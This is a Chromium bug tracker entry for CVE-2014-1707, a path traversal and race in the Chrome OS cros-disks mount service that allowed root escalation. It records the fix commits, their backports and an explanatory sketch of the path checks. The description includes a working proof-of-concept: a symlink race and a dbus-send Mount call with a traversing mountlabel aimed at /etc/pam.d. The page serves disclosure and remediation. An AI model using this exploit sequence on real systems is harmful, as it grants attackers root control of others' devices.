
Issue 351811

Starred by 2 users

Issue metadata

Status: Verified
Owner:
Closed: Mar 2014
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Chrome
Pri: 1
Type: Bug-Security

Blocking:
issue 351788




Security: Pwnium 4 GeoHot bug: cros-disks accepts labels, has path traversal issues.

Project Member Reported by jorgelo@chromium.org, Mar 12 2014

Issue description

ln -s /tmp/condo/a/a/a /tmp/condo/symlink 2> /dev/null &

dbus-send --system --type=method_call --dest=org.chromium.CrosDisks \
/org/chromium/CrosDisks org.chromium.CrosDisks.Mount \
string:"$TARBALL" \
string:"" array:string:"mountlabel=../../tmp/condo/symlink/../../../etc/pam.d" &

rm -rf /tmp/condo/symlink &
mkdir /tmp/condo/symlink &
# mount needs to happen here
# AND IT DOES SOMETIMES!
rm -rf /tmp/condo/symlink &
 
Blocking: chromium:351788
Cc: -benchan@chromium.org jorgelo@chromium.org
Owner: benchan@chromium.org
Ben has graciously offered to own this one.

Comment 3 by sumit@chromium.org, Mar 12 2014

Cc: olofj@chromium.org wad@chromium.org sumit@chromium.org
Status: Assigned
Status: Started
Beyond mountlabel, filesystem label can be exploited.

Comment 6 by sumit@chromium.org, Mar 12 2014

Cc: cmasone@chromium.org
Project Member

Comment 7 by bugdroid1@chromium.org, Mar 13 2014

Project: chromiumos/platform/cros-disks
Branch : master
Author : Ben Chan <benchan@chromium.org>
Commit : 20fd4336509af27e1c0d86e937ea4680109c55a3

Code-Review  0 : Will Drewry, chrome-internal-fetch
Code-Review  +2: Ben Chan, Jorge Lucangeli Obes, Kees Cook
Commit-Queue 0 : Jorge Lucangeli Obes, Kees Cook, Will Drewry, chrome-internal-fetch
Commit-Queue +1: Ben Chan
Verified     0 : Jorge Lucangeli Obes, Kees Cook, Will Drewry, chrome-internal-fetch
Verified     +1: Ben Chan
Commit Queue   : Chumped
Change-Id      : I7a880818a565820c6549a9b127292cad178b010b
Reviewed-at    : https://chromium-review.googlesource.com/189715

Validate source and mount path.

This CL adds validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

cros_disks_server.cc
mount_manager.cc
mount_manager.h
mount_manager_unittest.cc
platform.cc
platform.h
platform_unittest.cc
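
The two rules in the commit message above, sketched as an added example (this is not the cros-disks code; the function names and the `/media/archive` mount root are assumptions made for illustration). It shows why a label such as the one in the issue description is rejected: the mount path is accepted only when it is the mount root plus exactly one path component.

```cpp
#include <cstdlib>
#include <string>

// Rule 1: resolve symlinks, "." and ".." in the source path before any
// policy check looks at it. Fails if the path does not exist.
bool CanonicalizeSource(const std::string& source, std::string* canonical) {
  char* resolved = realpath(source.c_str(), nullptr);  // malloc'd by libc
  if (resolved == nullptr)
    return false;
  *canonical = resolved;
  free(resolved);
  return true;
}

// Rule 2: mount_path must be exactly <mount_root>/<name>, where <name> is a
// single component. "." and ".." are rejected rather than normalized away,
// because lexical normalization is wrong once a symlink is on the path.
bool IsImmediateChildOf(const std::string& mount_root,
                        const std::string& mount_path) {
  std::string root = mount_root;
  while (root.size() > 1 && root.back() == '/')
    root.pop_back();
  if (root.empty() || root[0] != '/')
    return false;
  const std::string prefix = (root == "/") ? root : root + "/";
  if (mount_path.compare(0, prefix.size(), prefix) != 0)
    return false;
  const std::string name = mount_path.substr(prefix.size());
  if (name.empty() || name == "." || name == "..")
    return false;
  return name.find('/') == std::string::npos;
}

// Builds the mount path from an untrusted label (hypothetical helper) and
// refuses any label that would place the mount outside the root.
bool BuildMountPath(const std::string& mount_root, const std::string& label,
                    std::string* mount_path) {
  const std::string candidate = mount_root + "/" + label;
  if (!IsImmediateChildOf(mount_root, candidate))
    return false;
  *mount_path = candidate;
  return true;
}
```

With a single-component name, path resolution never passes through a user-writable directory, assuming the mount root itself is writable only by the daemon.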
Project Member

Comment 8 by bugdroid1@chromium.org, Mar 13 2014

Project: chromiumos/platform/cros-disks
Branch : stabilize-5116.115.B
Author : Ben Chan <benchan@chromium.org>
Commit : 0bd6d4f079db893ed4b884d4a5c70d3d4393ba45

Code-Review  0 : Ben Chan
Code-Review  +2: Jorge Lucangeli Obes
Commit-Queue 0 : Jorge Lucangeli Obes
Commit-Queue +1: Ben Chan
Verified     0 : Jorge Lucangeli Obes
Verified     +1: Ben Chan
Commit Queue   : Chumped
Change-Id      : Ie67a6ce8b7d97a64a0c8576c508660b2bac4a39c
Reviewed-at    : https://chromium-review.googlesource.com/189761

Validate source and mount path.

This CL adds validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

cros_disks_server.cc
mount_manager.cc
mount_manager.h
mount_manager_unittest.cc
platform.cc
platform.h
platform_unittest.cc
Project Member

Comment 9 by bugdroid1@chromium.org, Mar 13 2014

Labels: M-33
Project: chromiumos/platform/cros-disks
Branch : release-R33-5116.B
Author : Ben Chan <benchan@chromium.org>
Commit : a41cb97fa5312150d29c822f8928fe9eca589b89

Code-Review  0 : Ben Chan
Code-Review  +2: Jorge Lucangeli Obes
Commit-Queue 0 : Jorge Lucangeli Obes
Commit-Queue +1: Ben Chan
Verified     0 : Jorge Lucangeli Obes
Verified     +1: Ben Chan
Commit Queue   : Chumped
Change-Id      : Ibdb15de39ce0e9e9364bf1528cbc9ed7af6569b7
Reviewed-at    : https://chromium-review.googlesource.com/189763

Validate source and mount path.

This CL adds validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

cros_disks_server.cc
mount_manager.cc
mount_manager.h
mount_manager_unittest.cc
platform.cc
platform.h
platform_unittest.cc
Project Member

Comment 10 by bugdroid1@chromium.org, Mar 13 2014

Labels: M-34
Project: chromiumos/platform/cros-disks
Branch : release-R34-5500.B
Author : Ben Chan <benchan@chromium.org>
Commit : bd89ed1ddaf6bd861947c0c900c40420fca6d70a

Code-Review  0 : Ben Chan
Code-Review  +2: Jorge Lucangeli Obes
Commit-Queue 0 : Jorge Lucangeli Obes
Commit-Queue +1: Ben Chan
Verified     0 : Jorge Lucangeli Obes
Verified     +1: Ben Chan
Commit Queue   : Chumped
Change-Id      : I9558e2780c2318adc7d2eb3ec77b1c3ac7c1dd28
Reviewed-at    : https://chromium-review.googlesource.com/189762

Validate source and mount path.

This CL adds validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

cros_disks_server.cc
mount_manager.cc
mount_manager.h
mount_manager_unittest.cc
platform.cc
platform.h
platform_unittest.cc
Labels: Iteration-101 M-35 Cr-OS-Systems
Status: Fixed
Labels: Release-2-M33
Labels: -Release-2-M33 Release-3-M33
Cc: deepakg@chromium.org
Labels: CVE-2014-1707

Comment 16 by k...@google.com, Mar 14 2014

Cc: kamakshi@chromium.org
Labels: Security_Impact-Beta Security_Impact-Stable
Labels: Security_Severity-Critical
Root escalation.
Labels: -Security_Severity-Critical Security_Severity-High
High for root escalation.
Cc: ka...@chromium.org
Cc: scottz@chromium.org

Comment 22 by ka...@chromium.org, Mar 14 2014

Status: Verified
Cc: mbevand@google.com
Project Member

Comment 24 by ClusterFuzz, Jun 19 2014

Labels: -Restrict-View-SecurityTeam
Bulk update: removing view restriction from closed bugs.
Project Member

Comment 25 by sheriffbot@chromium.org, Mar 22 2016

Labels: -security_impact-beta
Project Member

Comment 26 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 27 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 28 by sheriffbot@chromium.org, Oct 2 2016

Labels: Restrict-View-SecurityNotify
Labels: allpublic
Project Member

Comment 30 by sheriffbot@chromium.org, Oct 3 2016

Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: CVE_description-submitted
Project Member

Comment 32 by bugdroid1@chromium.org, Jun 28

Labels: merge-merged-stabilize-5116.115.B
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/platform/cros-disks/+/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45

commit 0bd6d4f079db893ed4b884d4a5c70d3d4393ba45
Author: Ben Chan <benchan@chromium.org>
Date: Thu Mar 13 01:41:46 2014

Validate source and mount path.

This CL adds validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

Change-Id: Ie67a6ce8b7d97a64a0c8576c508660b2bac4a39c
Reviewed-on: https://chromium-review.googlesource.com/189761
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>
Commit-Queue: Ben Chan <benchan@chromium.org>
Tested-by: Ben Chan <benchan@chromium.org>

[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/cros_disks_server.cc
[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/mount_manager.cc
[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/platform.cc
[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/platform.h
[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/platform_unittest.cc
[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/mount_manager.h
[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/mount_manager_unittest.cc

Project Member

Comment 33 by bugdroid1@chromium.org, Jun 28

Labels: merge-merged-release-R34-5500.B
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/platform/cros-disks/+/bd89ed1ddaf6bd861947c0c900c40420fca6d70a

commit bd89ed1ddaf6bd861947c0c900c40420fca6d70a
Author: Ben Chan <benchan@chromium.org>
Date: Thu Mar 13 01:42:22 2014

Validate source and mount path.

This CL adds validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

Change-Id: I9558e2780c2318adc7d2eb3ec77b1c3ac7c1dd28
Reviewed-on: https://chromium-review.googlesource.com/189762
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>
Commit-Queue: Ben Chan <benchan@chromium.org>
Tested-by: Ben Chan <benchan@chromium.org>

[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/cros_disks_server.cc
[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/mount_manager.cc
[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/platform.cc
[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/platform.h
[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/platform_unittest.cc
[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/mount_manager.h
[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/mount_manager_unittest.cc

Project Member

Comment 34 by bugdroid1@chromium.org, Jun 28

Labels: merge-merged-release-R33-5116.B
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/platform/cros-disks/+/a41cb97fa5312150d29c822f8928fe9eca589b89

commit a41cb97fa5312150d29c822f8928fe9eca589b89
Author: Ben Chan <benchan@chromium.org>
Date: Thu Mar 13 01:42:43 2014

Validate source and mount path.

This CL adds validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

Change-Id: Ibdb15de39ce0e9e9364bf1528cbc9ed7af6569b7
Reviewed-on: https://chromium-review.googlesource.com/189763
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>
Commit-Queue: Ben Chan <benchan@chromium.org>
Tested-by: Ben Chan <benchan@chromium.org>

[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/cros_disks_server.cc
[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/mount_manager.cc
[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/platform.cc
[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/platform.h
[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/platform_unittest.cc
[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/mount_manager.h
[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/mount_manager_unittest.cc

Project Member

Comment 35 by sheriffbot@chromium.org, Jul 29

Labels: -Pri-0 Pri-1
